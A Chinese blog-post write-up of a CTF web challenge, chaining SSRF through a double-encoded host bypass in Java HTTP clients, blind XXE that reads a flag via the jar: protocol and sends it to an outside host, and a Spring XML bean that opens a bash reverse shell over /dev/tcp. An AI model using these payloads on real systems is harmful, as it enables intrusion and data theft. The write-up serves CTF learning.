看雪CTF web(SSRF+XML+JAR协议)

最新推荐文章于 2023-10-14 09:54:25 发布
最新推荐文章于 2023-10-14 09:54:25 发布
阅读量1.5k 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/110456361
版权

题外

很久没写文章了,这儿再水一篇

正文

首先打开题目

在这里插入图片描述
直接有个提示,给了两个链接
根据测试第一个链接/getimage?url=https://bbs.pediy.com是远程加载图片的,而且对于url有一定的格式要求
在这里插入图片描述
那么我们怎么绕过这个正则呢?
这儿就需要用到一个技巧了,这儿是java环境,
httpclient3httpclient4这两个库都有容错机制,即假如端口后面存在其他字符会自动舍弃掉(/作为分隔符)

而且都会对host进行url二次解码,所以我们最终的payload为:

http://127.0.0.1%253a8088%252f.pediy.com/loadConfig?url=http://xxx.xxx.xxx.xxx/HyyMbb.xml

最终解析为:

http://127.0.0.1:8088/loadConfig?url=http://xxx.xxx.xxx.xxx/HyyMbb.xml

这样就能加载出url了,而另外一个url,loadConfig?url=x.xml可以远程加载XML文件,但是必须要本地访问,结合上一个url就可以本地访问了

在这里插入图片描述
在这里插入图片描述
这样就能加载文件了,那么我们直接用xml读文件就可以了

说一下思路,由于不知道java的路径,所以可以先读/proc/self/maps得到拓展地址,很有几率得到java路径,然后使用jar协议读取jar文件里面的flag

最终的payload

e.xml

<!ENTITY % payl SYSTEM "jar:file:///home/vip-demo-0.0.1-SNAPSHOT.jar!/BOOT-INF/classes/flag.txt">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'xxx://xxx.xxx.xxx.xxx:9997?%payl;'>">

HyyMbb.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE try[
<!ENTITY % int SYSTEM "http://xxx.xxx.xxx.xxx/e.xml">
%int;
%all;
%send;
]>

然后远程加载这个就可以了
在这里插入图片描述

正解

其实上面的解题过程是非预期,只是运气好可以猜对路径,然后还读出了flag
正解应该是利用FileSystemXmlApplicationContext来远程加载恶意xml
在这里插入图片描述
看到FileSystemXmlApplicationContext是不是很熟悉,记得去年weblogic有个漏洞的绕过就是利用了这个函数,加载了远程的恶意xml配置文件,导致反射代码执行。因此可以构造如下远程XML:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="
    http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2323 0>&1]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

然后可以反弹shell了~~

参考链接
HyyMbb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
CTF-WEB总结(四-题目来源i春秋)
weixin_41038905的博客
05-07 5194
Web总结: 1.网页源代码查看 即使浏览器不设置 直接访问此链接也可以看到原代码,后来发现其他网页也是如此, 所以破解方法有三个 一个是直接F12查看元素可以看到 一个是设置浏览器关闭js 一个是直接在链接前加view-source    注意看原代码的链接:view-source:http://159.138.137.79:55803/ 2.直接在链接后加/robots.txt,这边记录了爬虫...
ctf/web源码泄露及利用办法【总结中】
Sp4rkW的博客
10-06 2万+
.hg源码泄漏 漏洞成因: hg init的时候会生成.hg e.g.http://www.am0s.com/.hg/ 漏洞利用:工具:dvcs-ripper rip-hg.pl -v -u http://www.am0s.com/.hg/ .git源码泄漏 漏洞成因:在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等...
夺旗赛 CTF 六大方向基础工具简介集合(MISC,WEB,Crypto,Reverse,Pwn,Mobile)
热门推荐
小哈里的博客
01-14 2万+
1、MISC方向 杂项往往是不能被归到其他类别里的题目,所以什么样的题都有,工具也很杂。 主要的分类有: 1、视频音频图片类 Stegsolve.jar 一款图像隐写工具,支持使用不同方式解除图像隐写,是图像隐写的必备工具。可以破解色道隐写等,需要JAVA环境。 QR_Research.exe 用于扫描二维码,有些题目需要自己准备二维码定位角图用p图工具p上去 Audacity.exe 运行于windows的常用音频隐写工具 outguess(linux) 开源隐写算法,支持各种格式的文件,C语言编写 M
[0xGameCTF 2023] web题解
rev1ve的博客
10-14 1548
分析一下,过滤了分号,空格,斜杠,flag。参数c不为数字,不等于1024,且转换为整数时等于1024;简单分析一下,首先会检测MIME类型是否正确,然后经过二次渲染上传到指定路径。查看页面源码,发现存在前端检测(所以命令执行要bp抓包)和告诉我们hint。(这里我最初上传的gif带一句话木马刚好没被改,就不用再添加一句话木马了)然后在posts文件夹找到,得到flag。我们这里用的是gif,我们先上传一下。bp抓包,添加命令得到flag。访问,命令执行得到flag。按照要求来,得到flag。
CTF-web 常用软件安装及环境搭建
个人博客:https://www.mrzry.top
03-07 1万+
标签:CTF, web安全, 软件安装, 环境搭建, Typora, phpStudy, python, Sublime Text, AntSword, JDK1.8, Burp Suite
Jar URL协议解析
04stone37
06-21 3836
Jar URL格式 jar:&amp;amp;lt;url&amp;amp;gt;!/{entry} 如:jar:http://www.example.com/ex.jar!/com/demo/Class.class Jar URL作用   作用: Jar包中资源文件的路径表示 Jar URL分类 Jar file(Jar包本身):jar:http://www.foo.com/bar/baz.jar!/ Jar ...
CTF—Java 反编译&XXE&反序列化
qi_SJQ_的博客
03-02 5866
1.Java 常考点及出题思路: 考点技术:xxe,spel 表达式,反序列化,文件安全,最新框架插件漏洞等。 一般都会设法间接给出源码或相关配置提示文件,间接性源码或直接源码体现等形式,否则单纯黑盒难度比较大。 ctf web信息泄露总结: 参考:https://www.cnblogs.com/xishaonian/p/7628153.html 00x1 .ng 源码泄露 00x2 git 源码泄露 00x3 .DS_Store 文件泄漏 00x4 网站备份压缩文件 00x5 SVN 导致文件泄露 00.
Apache Solr 服务端请求伪造组合利用代码执行漏洞
whoami
04-17 378
Solr拥有出网条件下,有一个官方提供的一个正常功能接口,当requestDispatcher.requestParsers.enableRemoteStreaming参数远程设置为true后,可实现http协议ssrf,netdoc协议目录遍历,file协议读取任意文件,jar协议注入tmp文件。当Solr以SolrCloud模式启动时,攻击者可以通过构造恶意的solrconfig.xml文件,组合利用从而执行任意java代码。以 solrcloud 方式部署的机器不出网或添加Solr身份校验。
网络安全--XXE漏洞利用思路
jazzz98的博客
05-19 1842
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
源码获取+ctf+web安全
10-08
源码获取,源码泄露+ctf+web安全
CTF+XYCTF+120道题目+独家
最新发布
04-28
深入了解网络安全、数据保护和恶意软件等技术话题,从零日漏洞到故障转移,一切尽在您的掌握中!
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF gopher协议
a3320315的博客
11-03 7186
0x01 例题 这儿举例安恒的一道月题 tips:利用ssrf,gopher打内网 0x02 贴出代码 <?php highlight_file(__FILE__); $x = $_GET['x']; $pos = strpos($x,"php"); if($pos){ exit("denied"); } $ch = curl_init(); curl_setopt($ch,...
CTF比赛中,命令中空格被过滤的解决方法
a3320315的博客
08-19 6516
1、linux {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过) 2、windows下 (实用性不是很广,也就type这个命令可以用) ty...
攻防世界 Web_php_unserialize的坑
a3320315的博客
09-26 3406
题目要求传入的参数先base64解码,然后再反序列化。 题目中的class有一个私有变量,我知道最后打印出来的序列化内容会在类名前后加%00。 (ps:以前做相关序列化的题是直接GET传入参数,所以浏览器自动解码%00)但是今天我是先把%00加进去再去别的网站进行base64编码,这就是问题所在,编码时不会把%00当做一个特殊字符,结果就是死活不对。其实直接在php里面编码就行了。(菜得真实) ...
2020第五空间 web writeup
a3320315的博客
06-27 3260
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
HFCTF2020 web writeup
a3320315的博客
04-21 3048
easy_login just_escape 进入这个页面 然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示 我们输入Error().stack 可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤 所以我们使用字符串拼接就可以了~~ 然后我们去网上找一下关于vm2的payload 所以最终的payload为: (function (...
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHub—SSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值